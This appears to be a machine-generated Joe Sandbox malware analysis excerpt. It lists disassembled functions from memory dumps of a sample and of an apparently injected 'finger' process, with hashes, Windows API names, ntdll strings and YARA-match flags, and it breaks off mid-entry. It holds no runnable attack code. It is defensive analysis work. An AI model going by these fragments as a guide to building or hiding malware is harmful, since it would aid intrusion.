                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: cb0ea75a9ab3aff05da743f331fed4cf8c3e918d0e235a07fabe82dc49aa9925
                                                                                                      • Instruction ID: 40618689e7c66a2bf84546bce4a1ccf675ff809b8b53c4ae1c7cc2c176c8a9c1
                                                                                                      • Opcode Fuzzy Hash: cb0ea75a9ab3aff05da743f331fed4cf8c3e918d0e235a07fabe82dc49aa9925
                                                                                                      • Instruction Fuzzy Hash: 7F90023520141802D10871584904686001597D0301F55C011E6025655ED76589917232
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f8ee1d58add0cdeb5aaa0c961d38c51945dc90432718cb55b8e1f33d35ed2e5e
                                                                                                      • Instruction ID: 802980f01cb682a88aca4bb7e354741b0795bff67a73a24e2df0e59ab5073be2
                                                                                                      • Opcode Fuzzy Hash: f8ee1d58add0cdeb5aaa0c961d38c51945dc90432718cb55b8e1f33d35ed2e5e
                                                                                                      • Instruction Fuzzy Hash: 8B90043570541C03D154715C45147470015D7D0301F55C011F0035754DC755CF5577F3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7bb4f972869841fc2482b8fcbffb4f7718f229f3845611094b8dc2b10fd0d55e
                                                                                                      • Instruction ID: 8f3319c1dc9f41404faf9ffcf644b87810eb6d35b253bd91d447985c5388025e
                                                                                                      • Opcode Fuzzy Hash: 7bb4f972869841fc2482b8fcbffb4f7718f229f3845611094b8dc2b10fd0d55e
                                                                                                      • Instruction Fuzzy Hash: 9990023520141802D1847158450464A001597D1301F95C015E0026654DCB158B5977A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1128dd894be6d016cc2ecb77b30e559f7d4bf2302a6e5cb3265f12def0f6cf32
                                                                                                      • Instruction ID: f3ab06f952507d25aeb04819460f6e822100fcd123df49fef43b868318bc0bd6
                                                                                                      • Opcode Fuzzy Hash: 1128dd894be6d016cc2ecb77b30e559f7d4bf2302a6e5cb3265f12def0f6cf32
                                                                                                      • Instruction Fuzzy Hash: 8D90023520545842D14471584504A46002597D0305F55C011E0065694DD7258E55B762
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9079fc362e7f7c0003838e3382be7297dbc9292a0e649ec12ef7d38975cfc65a
                                                                                                      • Instruction ID: b493e102664d3b4246bf230070597d944ae6c77385cb581e664dcd67f43defa9
                                                                                                      • Opcode Fuzzy Hash: 9079fc362e7f7c0003838e3382be7297dbc9292a0e649ec12ef7d38975cfc65a
                                                                                                      • Instruction Fuzzy Hash: 809002A5201550924504B2588504B0A451597E0201B55C016E1055560CC62589519236
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fa7bd60aa1fd2d018e88cad596c0f7dc8b6d3faa55d9ba7d81065935081e0b25
                                                                                                      • Instruction ID: e6d006b780cbe16a2a3b94064f2d878611d8cd94e984cd3c284c8879f0a273b5
                                                                                                      • Opcode Fuzzy Hash: fa7bd60aa1fd2d018e88cad596c0f7dc8b6d3faa55d9ba7d81065935081e0b25
                                                                                                      • Instruction Fuzzy Hash: 4790043D31141003010DF55C07045070057D7D5351355C031F1017550CD731CD715333
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7187245e8c0f558cef8e482d379e714a9aef57ef9ab433178f88161db8a46890
                                                                                                      • Instruction ID: 9940581e97fd847cc0ed2ebbb24305afd6386be4a3a0a295363154460ccd7293
                                                                                                      • Opcode Fuzzy Hash: 7187245e8c0f558cef8e482d379e714a9aef57ef9ab433178f88161db8a46890
                                                                                                      • Instruction Fuzzy Hash: A790026520181403D14475584904607001597D0302F55C011E2065555ECB298D516236
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2e9f8cc82dbf0efbf691f5e033580f0fe3cb39431088545d19b5560c8c31db96
                                                                                                      • Instruction ID: 1b7b9813fbbdc18c88761979190edde1d944bb53257e3371c2ac896b6d60f9e6
                                                                                                      • Opcode Fuzzy Hash: 2e9f8cc82dbf0efbf691f5e033580f0fe3cb39431088545d19b5560c8c31db96
                                                                                                      • Instruction Fuzzy Hash: 7390022520185442D14472584904B0F411597E1202F95C019E4157554CCA1589555722
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6560ecfbad82887250e814766aefd24534171d3aa740682cded4691952fa302d
                                                                                                      • Instruction ID: bd1099dd4435e66a2bef9a4ada460972d153ea4689f3cecd4699aef5bb619023
                                                                                                      • Opcode Fuzzy Hash: 6560ecfbad82887250e814766aefd24534171d3aa740682cded4691952fa302d
                                                                                                      • Instruction Fuzzy Hash: DD90022524141802D144715885147070016D7D0601F55C011E0025554DC7168A6567B2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f6424d39d4392a68220fc6af12ca7e5806cd5f6bd8f8b809c275f8e0fd2afcdf
                                                                                                      • Instruction ID: ecc817c627578f221261662e3fa6203cd068ff23c91c73d84d64de36973240b3
                                                                                                      • Opcode Fuzzy Hash: f6424d39d4392a68220fc6af12ca7e5806cd5f6bd8f8b809c275f8e0fd2afcdf
                                                                                                      • Instruction Fuzzy Hash: 7290043534547103D154715C45047174015F7F0301F55C031F0C155D4DC755CD557333
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8c3a5f0306769cbdc1c22f0ed0845af2324757a1c3c998fb01634019bb3b47c7
                                                                                                      • Instruction ID: edd5042e6fb6371ebcfe42e05c16972df5c8722b9774e8386485b62c19d87b68
                                                                                                      • Opcode Fuzzy Hash: 8c3a5f0306769cbdc1c22f0ed0845af2324757a1c3c998fb01634019bb3b47c7
                                                                                                      • Instruction Fuzzy Hash: 7F90023520241142954472585904A4E411597E1302B95D415E0016554CCA1489615322
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: cd2b6c88719ec287d9975dfefc02c72eda24b60758746ac36cc315085171d2d8
                                                                                                      • Instruction ID: 6f73ef49ce9d53d01c67d3e4f58e21328f58e6c142e06d3458fd1e2416deaf46
                                                                                                      • Opcode Fuzzy Hash: cd2b6c88719ec287d9975dfefc02c72eda24b60758746ac36cc315085171d2d8
                                                                                                      • Instruction Fuzzy Hash: B990023920141402D51471585904646005697D0301F55D411E0425558DC75489A1A222
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                      • Instruction ID: f50c2a332d6ecf4a94890fbdc1e7e8f755e852d62214f9b67cbc070c094e8110
                                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                      • Instruction Fuzzy Hash:
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                      • API String ID: 48624451-2108815105
                                                                                                      • Opcode ID: c928e2873c7a2ed13ca5cd9e69a7e2b10c8cb5b25def5355a3dbe0bd126fd025
                                                                                                      • Instruction ID: a369943c0c5a74da8e2e1fefda9b861909551b2629d43a39712f10650fcaf4e0
                                                                                                      • Opcode Fuzzy Hash: c928e2873c7a2ed13ca5cd9e69a7e2b10c8cb5b25def5355a3dbe0bd126fd025
                                                                                                      • Instruction Fuzzy Hash: 1751E7B5A00126BFDB19DB9C889097EFBF8BF18640B14C12DF569D7641E374DE4087A0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                      • API String ID: 48624451-2108815105
                                                                                                      • Opcode ID: 46c026aafeca55f9c61a0d7a3ff64980f567a991c31b74778e6d7782a5d053f1
                                                                                                      • Instruction ID: cbe1893ea627eeb02f4676228a87ee45f8a1df044b36a49739005667009088cf
                                                                                                      • Opcode Fuzzy Hash: 46c026aafeca55f9c61a0d7a3ff64980f567a991c31b74778e6d7782a5d053f1
                                                                                                      • Instruction Fuzzy Hash: BD5119B1A10646EECB38DF5CC89097FB7F8EF88200B448559E6D6D7681D7B4EA40C760
                                                                                                      Strings
                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 011F4655
                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 011F4787
                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011F46FC
                                                                                                      • ExecuteOptions, xrefs: 011F46A0
                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 011F4725
                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 011F4742
                                                                                                      • Execute=1, xrefs: 011F4713
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                      • API String ID: 0-484625025
                                                                                                      • Opcode ID: adc28a5336ab2bb357234ed6d85dc1152cf60d02030d1956bbf63129a4f831fc
                                                                                                      • Instruction ID: e98d55b95007f403fbe6ef2e5358a47b5e0079b0a13655b731bcf580d99a8546
                                                                                                      • Opcode Fuzzy Hash: adc28a5336ab2bb357234ed6d85dc1152cf60d02030d1956bbf63129a4f831fc
                                                                                                      • Instruction Fuzzy Hash: 51513931A002197AEF2DABA8ECD9FFE77A8AF98704F04019DD605A71C1E7719A418F51
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldvrm
                                                                                                      • String ID: +$-$0$0
                                                                                                      • API String ID: 1302938615-699404926
                                                                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                      • Instruction ID: 802d2273c66ed54bf74238e9f6b9068f91ebff6420fdc5118e43c5edf3778748
                                                                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                      • Instruction Fuzzy Hash: D081A070E092599EEF2D8EACC8527FEBBB1AF65BA0F18411DD851E72D1C7348840CB59
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: %%%u$[$]:%u
                                                                                                      • API String ID: 48624451-2819853543
                                                                                                      • Opcode ID: 094a33a492c6c47f4dc24acc6ffdf382112ff50819ecea5403f4d65cea6a2988
                                                                                                      • Instruction ID: 711b3bcae142224257ff337682654c744e877b20df3cb5642e44ba5be12cc516
                                                                                                      • Opcode Fuzzy Hash: 094a33a492c6c47f4dc24acc6ffdf382112ff50819ecea5403f4d65cea6a2988
                                                                                                      • Instruction Fuzzy Hash: C52167B6A1011AABDB14DF79DD44AEEBBF8EF94644F040119EA45E3201E731DA018BE1
                                                                                                      Strings
                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011F02BD
                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011F02E7
                                                                                                      • RTL: Re-Waiting, xrefs: 011F031E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                      • API String ID: 0-2474120054
                                                                                                      • Opcode ID: 42f2ac342969890b2b4bc607886b77f1c831c47e9a1b9ea8f317dc04004a5ca7
                                                                                                      • Instruction ID: 00fa435888f7e959e83dee6f8eae194e1a83379cb4cceb3159fe4267e7967a6b
                                                                                                      • Opcode Fuzzy Hash: 42f2ac342969890b2b4bc607886b77f1c831c47e9a1b9ea8f317dc04004a5ca7
                                                                                                      • Instruction Fuzzy Hash: C6E1BF746087429FD72DCF28C884B2ABBE1FB88714F540A1DF6A58B2D2D774D845CB52
                                                                                                      Strings
                                                                                                      • RTL: Resource at %p, xrefs: 011F7B8E
                                                                                                      • RTL: Re-Waiting, xrefs: 011F7BAC
                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 011F7B7F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                      • API String ID: 0-871070163
                                                                                                      • Opcode ID: e5fa16415fc473cdeb544d2d61a761fc6a135292d1ef25e1a8f008593757cdc4
                                                                                                      • Instruction ID: 5c5cfed05af177d0dc334640eb7f457773d92891b0729f6265a0d04c212356ab
                                                                                                      • Opcode Fuzzy Hash: e5fa16415fc473cdeb544d2d61a761fc6a135292d1ef25e1a8f008593757cdc4
                                                                                                      • Instruction Fuzzy Hash: A54107313097069FD729DE29CC80BAAB7E5EF99710F000A1DFA56D7A80DB31E405CB96
                                                                                                      APIs
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011F728C
                                                                                                      Strings
                                                                                                      • RTL: Resource at %p, xrefs: 011F72A3
                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 011F7294
                                                                                                      • RTL: Re-Waiting, xrefs: 011F72C1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                      • API String ID: 885266447-605551621
                                                                                                      • Opcode ID: 7308da1af4438eb1f82457badef00f86faa89cae1540024a96d7b0cd324f46d6
                                                                                                      • Instruction ID: 919164c72430e2276c44571b48d1af31ef7705077e998ee417b47e6c1f39d233
                                                                                                      • Opcode Fuzzy Hash: 7308da1af4438eb1f82457badef00f86faa89cae1540024a96d7b0cd324f46d6
                                                                                                      • Instruction Fuzzy Hash: F141F035608602AFD729DE29CC81FAAB7A5FB94710F10061DFA56AB680DB31E812C7D5
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: %%%u$]:%u
                                                                                                      • API String ID: 48624451-3050659472
                                                                                                      • Opcode ID: 1760823b2f64c3d6d9086654b79ae05be0c998bdbf546a7aba4414aa1039daaa
                                                                                                      • Instruction ID: baa5a718e657b6002d7d6f2ef0df309000360e820d6575f1bb6d22cb18514813
                                                                                                      • Opcode Fuzzy Hash: 1760823b2f64c3d6d9086654b79ae05be0c998bdbf546a7aba4414aa1039daaa
                                                                                                      • Instruction Fuzzy Hash: 42317872A1021ADFDB24DF2DDC40BEEB7F8EF54610F544559E949E3240EB30AA459BA0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldvrm
                                                                                                      • String ID: +$-
                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                      • Instruction ID: 652ef2780f8fae74a4b97a62eb2a6249f51033804ea5d8b4fafc4c1c20b919dd
                                                                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                      • Instruction Fuzzy Hash: 7291A671E002169BDB2CDF6DC8C16BEBBA5AF64B20F14451EE965E72C0D7B08941CF52
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $$@
                                                                                                      • API String ID: 0-1194432280
                                                                                                      • Opcode ID: 5468bd9e8881d52c6103ec385dfdc3031f41674d3ee416c8cd1f3019e302b637
                                                                                                      • Instruction ID: c21129b17db58b0998d3adf72c89bda28b2b6009761f87beaa8973be2c8b94ea
                                                                                                      • Opcode Fuzzy Hash: 5468bd9e8881d52c6103ec385dfdc3031f41674d3ee416c8cd1f3019e302b637
                                                                                                      • Instruction Fuzzy Hash: 6A812E71D006699BDB39DB94CC44BEEB7B8AF48714F0041DAEA19B7240D7705E84CFA0
                                                                                                      APIs
                                                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0120CFBD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallFilterFunc@8
                                                                                                      • String ID: @$@4Qw@4Qw
                                                                                                      • API String ID: 4062629308-2383119779
                                                                                                      • Opcode ID: 9dba31561de1362d8fe39cf1a962e30cd376cc1f82cf4dfa5681eb5ff61de56b
                                                                                                      • Instruction ID: 7597a56dbe69ea9aada6a7299bd36970c7213a6d3ec8199614ac369c22460d34
                                                                                                      • Opcode Fuzzy Hash: 9dba31561de1362d8fe39cf1a962e30cd376cc1f82cf4dfa5681eb5ff61de56b
                                                                                                      • Instruction Fuzzy Hash: AC41D671911219DFDB26DFE9C840AAEBBB9FF54B54F00422EEA14DB295D770C801CB61

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:2.6%
                                                                                                      Dynamic/Decrypted Code Coverage:4.2%
                                                                                                      Signature Coverage:1.5%
                                                                                                      Total number of Nodes:455
                                                                                                      Total number of Limit Nodes:73

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 5Z$9$<$>$L$N$N$Pw$So$`$fN$j$m$n$X$s
                                                                                                      • API String ID: 0-2357910541
                                                                                                      • Opcode ID: 4c2af9f089e0fcfae82c6820f6eb6b89c132f7cbd260e8750c1974e2b9a86eeb
                                                                                                      • Instruction ID: e66eebd02a527ccc8561777227b347863812d4634d523b1eb94bc992d38e7ffa
                                                                                                      • Opcode Fuzzy Hash: 4c2af9f089e0fcfae82c6820f6eb6b89c132f7cbd260e8750c1974e2b9a86eeb
                                                                                                      • Instruction Fuzzy Hash: 08029EB0D05229CFEB24CF94C898BADBBB2BB44308F1085D9D50D6B281D7B95A85CF56
                                                                                                      APIs
                                                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 0060C894
                                                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 0060C8CF
                                                                                                      • FindClose.KERNELBASE(?), ref: 0060C8DA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 3541575487-0
                                                                                                      • Opcode ID: 74d106090a7080095cc7420a55ff87f1c068363cb79c4006443c16e485b3f75b
                                                                                                      • Instruction ID: 1b8774bb3226bb3bb3d60220483df97879f33df6e71737358b00770c4b044fbe
                                                                                                      • Opcode Fuzzy Hash: 74d106090a7080095cc7420a55ff87f1c068363cb79c4006443c16e485b3f75b
                                                                                                      • Instruction Fuzzy Hash: 1F31B471940308BBDB24EFA0CC85FFF777DEF84754F144559B908A61C1DA70AA848BA4
                                                                                                      APIs
                                                                                                      • NtCreateFile.NTDLL(161FBA40,?,?,?,?,?,?,?,?,?,?), ref: 00619438
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_8_2_5f0000_finger.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: 913b0aa7505f0623b442c70bc7bed9716eb88d71eb565b98757f04a2e86dff34
                                                                                                      • Instruction ID: 9a04548eec0f95bc4b750a031ec94c62ad10eb05c059b0db5a619b41519586d1
                                                                                                      • Opcode Fuzzy Hash: 913b0aa7505f0623b442c70bc7bed9716eb88d71eb565b98757f04a2e86dff34
                                                                                                      • Instruction Fuzzy Hash: 6831EFB5A00648ABCB54DF99C881EEEB7F9EF88710F108219F919A7341D730A951CFA4
                                                                                                      APIs
                                                                                                      • NtReadFile.NTDLL(161FBA40,?,?,?,?,?,?,?,?), ref: 00619580
                                                                                                      Memory Dump Source
